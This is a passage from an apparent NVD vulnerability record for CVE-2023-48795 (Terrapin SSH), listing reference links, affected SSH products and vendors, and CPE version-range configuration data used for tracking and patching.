| cve@mitre.org | https://www.lancom-systems.de/service-support/allgemeine-sicherheitshinweise#c243508 | Vendor Advisory | |
| cve@mitre.org | https://www.netsarang.com/en/xshell-update-history/ | Release Notes | |
| cve@mitre.org | https://www.openssh.com/openbsd.html | Release Notes | |
| cve@mitre.org | https://www.openssh.com/txt/release-9.6 | Release Notes | |
| cve@mitre.org | https://www.openwall.com/lists/oss-security/2023/12/18/2 | Mailing List | |
| cve@mitre.org | https://www.openwall.com/lists/oss-security/2023/12/20/3 | Mailing List, Mitigation | |
| cve@mitre.org | https://www.paramiko.org/changelog.html | Release Notes | |
| cve@mitre.org | https://www.reddit.com/r/sysadmin/comments/18idv52/cve202348795_why_is_this_cve_still_undisclosed/ | Issue Tracking | |
| cve@mitre.org | https://www.suse.com/c/suse-addresses-the-ssh-v2-protocol-terrapin-attack-aka-cve-2023-48795/ | Press/Media Coverage | |
| cve@mitre.org | https://www.terrapin-attack.com | Exploit | |
| cve@mitre.org | https://www.theregister.com/2023/12/20/terrapin_attack_ssh | Press/Media Coverage | |
| cve@mitre.org | https://www.vandyke.com/products/securecrt/history.txt | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | http://packetstormsecurity.com/files/176280/Terrapin-SSH-Connection-Weakening.html | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | http://seclists.org/fulldisclosure/2024/Mar/21 | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2023/12/18/3 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2023/12/19/5 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2023/12/20/3 | Mailing List, Mitigation | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/03/06/3 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/04/17/8 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | https://access.redhat.com/security/cve/cve-2023-48795 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://arstechnica.com/security/2023/12/hackers-can-break-ssh-channel-integrity-using-novel-data-corruption-attack/ | Press/Media Coverage | |
| af854a3a-2127-422b-91ae-364da2661108 | https://bugs.gentoo.org/920280 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://bugzilla.redhat.com/show_bug.cgi?id=2254210 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://bugzilla.suse.com/show_bug.cgi?id=1217950 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://crates.io/crates/thrussh/versions | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://filezilla-project.org/versions.php | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://forum.netgate.com/topic/184941/terrapin-ssh-attack | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://git.libssh.org/projects/libssh.git/commit/?h=stable-0.10&id=10e09e273f69e149389b3e0e5d44b8c221c2e7f6 | Patch | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/NixOS/nixpkgs/pull/275249 | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/PowerShell/Win32-OpenSSH/issues/2189 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/PowerShell/Win32-OpenSSH/releases/tag/v9.5.0.0p1-Beta | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/TeraTermProject/teraterm/commit/7279fbd6ef4d0c8bdd6a90af4ada2899d786eec0 | Patch | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/TeraTermProject/teraterm/releases/tag/v5.1 | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/advisories/GHSA-45x7-px36-x8w8 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/apache/mina-sshd/issues/445 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/connectbot/sshlib/commit/5c8b534f6e97db7ac0e0e579331213aa25c173ab | Patch | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/connectbot/sshlib/compare/2.2.21...2.2.22 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/cyd01/KiTTY/issues/520 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/drakkan/sftpgo/releases/tag/v2.5.6 | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/erlang/otp/blob/d1b43dc0f1361d2ad67601169e90a7fc50bb0369/lib/ssh/doc/src/notes.xml#L39-L42 | Patch | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/erlang/otp/releases/tag/OTP-26.2.1 | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/golang/crypto/commit/9d2ee975ef9fe627bf0a6f01c1f69e8ef1d4f05d | Patch | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/hierynomus/sshj/issues/916 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/janmojzis/tinyssh/issues/81 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/jtesta/ssh-audit/commit/8e972c5e94b460379fe0c7d20209c16df81538a5 | Patch | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/libssh2/libssh2/pull/1291 | Mitigation | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/mkj/dropbear/blob/17657c36cce6df7716d5ff151ec09a665382d5dd/CHANGES#L25 | Patch | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/mscdex/ssh2/commit/97b223f8891b96d6fc054df5ab1d5a1a545da2a3 | Patch | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/mwiede/jsch/compare/jsch-0.2.14...jsch-0.2.15 | Product | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/mwiede/jsch/issues/457 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/mwiede/jsch/pull/461 | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/net-ssh/net-ssh/blob/2e65064a52d73396bfc3806c9196fc8108f33cd8/CHANGES.txt#L14-L16 | Patch | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/openssh/openssh-portable/commits/master | Patch | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/paramiko/paramiko/issues/2337 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/proftpd/proftpd/blob/0a7ea9b0ba9fcdf368374a226370d08f10397d99/RELEASE_NOTES | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/proftpd/proftpd/blob/d21e7a2e47e9b38f709bec58e3fa711f759ad0e1/RELEASE_NOTES | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/proftpd/proftpd/blob/master/RELEASE_NOTES | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/proftpd/proftpd/issues/456 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/rapier1/hpn-ssh/releases | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/ronf/asyncssh/blob/develop/docs/changes.rst | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/ronf/asyncssh/tags | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/ssh-mitm/ssh-mitm/issues/165 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/warp-tech/russh/releases/tag/v0.40.2 | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://gitlab.com/libssh/libssh-mirror/-/tags | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://groups.google.com/g/golang-announce/c/-n5WqVC18LQ | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | https://groups.google.com/g/golang-announce/c/qA3XtxvMUyg | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | https://help.panic.com/releasenotes/transmit5/ | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://jadaptive.com/important-java-ssh-security-update-new-ssh-vulnerability-discovered-cve-2023-48795/ | Press/Media Coverage | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.debian.org/debian-lts-announce/2023/12/msg00017.html | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.debian.org/debian-lts-announce/2024/01/msg00013.html | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.debian.org/debian-lts-announce/2024/01/msg00014.html | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.debian.org/debian-lts-announce/2024/04/msg00016.html | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.debian.org/debian-lts-announce/2024/09/msg00042.html | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.debian.org/debian-lts-announce/2024/11/msg00032.html | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.debian.org/debian-lts-announce/2025/04/msg00028.html | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/33XHJUB6ROFUOH2OQNENFROTVH6MHSHA/ | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3CAYYW35MUTNO65RVAELICTNZZFMT2XS/ | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3JIMLVBDWOP4FUPXPTB4PGHHIOMGFLQE/ | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3YQLUQWLIHDB5QCXQEX7HXHAWMOKPP5O/ | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6Y74KVCPEPT4MVU3LHDWCNNOXOE5ZLUR/ | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/APYIXIQOVDCRWLHTGB4VYMAUIAQLKYJ3/ | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BL5KTLOSLH2KHRN4HCXJPK3JUVLDGEL6/ | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/C3AFMZ6MH2UHHOPIWT5YLSFV3D2VB3AC/ | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CHHITS4PUOZAKFIUBQAQZC7JWXMOYE4B/ | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/F7EYCFQCTSGJXWO3ZZ44MGKFC5HA7G3Y/ | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HYEDEXIKFKTUJIN43RG4B7T5ZS6MHUSP/ | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I724O3LSRCPO4WNVIXTZCT4VVRMXMMSG/ | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KEOTKBUPZXHE3F352JBYNTSNRXYLWD6P/ | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KMZCVGUGJZZVDPCVDA7TEB22VUCNEXDD/ | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L5Y6MNNVAPIJSXJERQ6PKZVCIUXSNJK7/ | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LZQVUHWVWRH73YBXUQJOD6CKHDQBU3DM/ | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MKQRBF3DWMWPH36LBCOBUTSIZRTPEZXB/ | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QI3EHAHABFQK7OABNCSF5GMYP6TONTI7/ | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/33XHJUB6ROFUOH2OQNENFROTVH6MHSHA/ | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3JIMLVBDWOP4FUPXPTB4PGHHIOMGFLQE/ | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3YQLUQWLIHDB5QCXQEX7HXHAWMOKPP5O/ | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6Y74KVCPEPT4MVU3LHDWCNNOXOE5ZLUR/ | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/APYIXIQOVDCRWLHTGB4VYMAUIAQLKYJ3/ | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/C3AFMZ6MH2UHHOPIWT5YLSFV3D2VB3AC/ | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HYEDEXIKFKTUJIN43RG4B7T5ZS6MHUSP/ | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I724O3LSRCPO4WNVIXTZCT4VVRMXMMSG/ | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L5Y6MNNVAPIJSXJERQ6PKZVCIUXSNJK7/ | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LZQVUHWVWRH73YBXUQJOD6CKHDQBU3DM/ | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MKQRBF3DWMWPH36LBCOBUTSIZRTPEZXB/ | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://matt.ucc.asn.au/dropbear/CHANGES | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://nest.pijul.com/pijul/thrussh/changes/D6H7OWTTMHHX6BTB3B6MNBOBX2L66CBL4LGSEUSAI2MCRCJDQFRQC | Patch | |
| af854a3a-2127-422b-91ae-364da2661108 | https://news.ycombinator.com/item?id=38684904 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://news.ycombinator.com/item?id=38685286 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://news.ycombinator.com/item?id=38732005 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://nova.app/releases/#v11.8 | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://oryx-embedded.com/download/#changelog | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0002 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://roumenpetrov.info/secsh/#news20231220 | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://security-tracker.debian.org/tracker/CVE-2023-48795 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://security-tracker.debian.org/tracker/source-package/libssh2 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://security-tracker.debian.org/tracker/source-package/proftpd-dfsg | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://security-tracker.debian.org/tracker/source-package/trilead-ssh2 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://security.gentoo.org/glsa/202312-16 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://security.gentoo.org/glsa/202312-17 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://security.netapp.com/advisory/ntap-20240105-0004/ | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://support.apple.com/kb/HT214084 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://thorntech.com/cve-2023-48795-and-sftp-gateway/ | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://twitter.com/TrueSkrillor/status/1736774389725565005 | Press/Media Coverage | |
| af854a3a-2127-422b-91ae-364da2661108 | https://ubuntu.com/security/CVE-2023-48795 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://winscp.net/eng/docs/history#6.2.2 | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.bitvise.com/ssh-client-version-history#933 | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.bitvise.com/ssh-server-version-history | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.chiark.greenend.org.uk/~sgtatham/putty/changes.html | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.crushftp.com/crush10wiki/Wiki.jsp?page=Update | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.debian.org/security/2023/dsa-5586 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.debian.org/security/2023/dsa-5588 | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.freebsd.org/security/advisories/FreeBSD-SA-23:19.openssh.asc | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.lancom-systems.de/service-support/allgemeine-sicherheitshinweise#c243508 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.netsarang.com/en/xshell-update-history/ | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.openssh.com/openbsd.html | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.openssh.com/txt/release-9.6 | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.openwall.com/lists/oss-security/2023/12/18/2 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.openwall.com/lists/oss-security/2023/12/20/3 | Mailing List, Mitigation | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.paramiko.org/changelog.html | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.reddit.com/r/sysadmin/comments/18idv52/cve202348795_why_is_this_cve_still_undisclosed/ | Issue Tracking | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.suse.com/c/suse-addresses-the-ssh-v2-protocol-terrapin-attack-aka-cve-2023-48795/ | Press/Media Coverage | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.terrapin-attack.com | Exploit | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.theregister.com/2023/12/20/terrapin_attack_ssh | Press/Media Coverage | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.vandyke.com/products/securecrt/history.txt | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.vicarius.io/vsociety/posts/cve-2023-48795-detect-openssh-vulnerabilit | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.vicarius.io/vsociety/posts/cve-2023-48795-mitigate-openssh-vulnerability | Exploit, Third Party Advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| openbsd | openssh | * | |
| putty | putty | * | |
| filezilla-project | filezilla_client | * | |
| apple | macos | - | |
| panic | transmit_5 | * | |
| apple | macos | - | |
| panic | nova | * | |
| roumenpetrov | pkixssh | * | |
| winscp | winscp | * | |
| bitvise | ssh_client | * | |
| bitvise | ssh_server | * | |
| lancom-systems | lcos | * | |
| lancom-systems | lcos_fx | - | |
| lancom-systems | lcos_lx | - | |
| lancom-systems | lcos_sx | 4.20 | |
| lancom-systems | lcos_sx | 5.20 | |
| lancom-systems | lanconfig | - | |
| vandyke | securecrt | * | |
| libssh | libssh | * | |
| net-ssh | net-ssh | 7.2.0 | |
| ssh2_project | ssh2 | * | |
| proftpd | proftpd | * | |
| freebsd | freebsd | * | |
| crates | thrussh | * | |
| tera_term_project | tera_term | * | |
| oryx-embedded | cyclone_ssh | * | |
| crushftp | crushftp | * | |
| netsarang | xshell_7 | * | |
| paramiko | paramiko | * | |
| redhat | openshift_container_platform | 4.0 | |
| redhat | openstack_platform | 16.1 | |
| redhat | openstack_platform | 16.2 | |
| redhat | openstack_platform | 17.1 | |
| redhat | ceph_storage | 6.0 | |
| redhat | enterprise_linux | 8.0 | |
| redhat | enterprise_linux | 9.0 | |
| redhat | openshift_serverless | - | |
| redhat | openshift_gitops | - | |
| redhat | openshift_pipelines | - | |
| redhat | openshift_developer_tools_and_services | - | |
| redhat | openshift_data_foundation | 4.0 | |
| redhat | openshift_api_for_data_protection | - | |
| redhat | openshift_virtualization | 4 | |
| redhat | storage | 3.0 | |
| redhat | discovery | - | |
| redhat | openshift_dev_spaces | - | |
| redhat | cert-manager_operator_for_red_hat_openshift | - | |
| redhat | keycloak | - | |
| redhat | jboss_enterprise_application_platform | 7.0 | |
| redhat | single_sign-on | 7.0 | |
| redhat | advanced_cluster_security | 3.0 | |
| redhat | advanced_cluster_security | 4.0 | |
| golang | crypto | * | |
| russh_project | russh | * | |
| sftpgo_project | sftpgo | * | |
| erlang | erlang\/otp | * | |
| erlang | erlang\/otp | * | |
| erlang | erlang\/otp | * | |
| erlang | erlang\/otp | * | |
| erlang | erlang\/otp | * | |
| matez | jsch | * | |
| libssh2 | libssh2 | * | |
| asyncssh_project | asyncssh | * | |
| dropbear_ssh_project | dropbear_ssh | * | |
| jadaptive | maverick_synergy_java_ssh_api | * | |
| ssh | ssh | * | |
| ssh | ssh | * | |
| ssh | ssh | * | |
| ssh | ssh | * | |
| ssh | ssh | * | |
| thorntech | sftp_gateway_firmware | * | |
| netgate | pfsense_plus | * | |
| netgate | pfsense_ce | * | |
| crushftp | crushftp | * | |
| connectbot | sshlib | * | |
| apache | sshd | * | |
| apache | sshj | * | |
| tinyssh | tinyssh | * | |
| trilead | ssh2 | 6401 | |
| 9bis | kitty | * | |
| gentoo | security | - | |
| debian | debian_linux | - | |
| fedoraproject | fedora | 38 | |
| fedoraproject | fedora | 39 | |
| debian | debian_linux | 10.0 | |
| apple | macos | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5308FBBB-F738-41C5-97A4-E40118E957CD",
"versionEndExcluding": "9.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:putty:putty:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A9D807DB-9E20-4792-8A9F-4BFFC841BAB7",
"versionEndExcluding": "0.80",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:filezilla-project:filezilla_client:*:*:*:*:*:*:*:*",
"matchCriteriaId": "42915485-A4DA-48DD-9C15-415D2D39DC52",
"versionEndExcluding": "3.66.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*",
"matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:panic:transmit_5:*:*:*:*:*:*:*:*",
"matchCriteriaId": "31FFE0AA-FC25-40DE-8EE9-7F4C80ABDE4F",
"versionEndExcluding": "5.10.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*",
"matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:panic:nova:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F2FCF7EF-97D7-44CF-AC74-72D856901755",
"versionEndExcluding": "11.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:roumenpetrov:pkixssh:*:*:*:*:*:*:*:*",
"matchCriteriaId": "53CAD263-1C60-43BD-86A2-C8DB15FFB4C6",
"versionEndExcluding": "14.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:winscp:winscp:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8FA57F20-C9C1-40A7-B2CD-F3440CCF1D66",
"versionEndExcluding": "6.2.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:bitvise:ssh_client:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6209E375-10C7-4E65-A2E7-455A686717AC",
"versionEndExcluding": "9.33",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:bitvise:ssh_server:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1A05CC3C-19C5-4BAA-ABA2-EE1795E0BE81",
"versionEndExcluding": "9.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:lancom-systems:lcos:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3A71B523-0778-46C6-A38B-64452E0BB6E7",
"versionEndIncluding": "3.66.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:lancom-systems:lcos_fx:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F1C91308-15E5-40AF-B4D5-3CAD7BC65DDF",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:lancom-systems:lcos_lx:-:*:*:*:*:*:*:*",
"matchCriteriaId": "418940E3-6DD1-4AA6-846A-03E059D0C681",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:lancom-systems:lcos_sx:4.20:*:*:*:*:*:*:*",
"matchCriteriaId": "411BA58A-33B6-44CA-B9D6-7F9042D46961",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:lancom-systems:lcos_sx:5.20:*:*:*:*:*:*:*",
"matchCriteriaId": "FA17A153-30E4-4731-8706-8F74FCA50993",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:lancom-systems:lanconfig:-:*:*:*:*:*:*:*",
"matchCriteriaId": "FB736F57-9BE3-4457-A10E-FA88D0932154",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:vandyke:securecrt:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6EB8D02D-87F3-414D-A3EA-43F594DAAC1B",
"versionEndExcluding": "9.4.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libssh:libssh:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AAB481DA-FBFE-4CC2-9AE7-22025FA07494",
"versionEndExcluding": "0.10.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:net-ssh:net-ssh:7.2.0:*:*:*:*:ruby:*:*",
"matchCriteriaId": "3D6FD459-F8E8-4126-8097-D30B4639404A",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
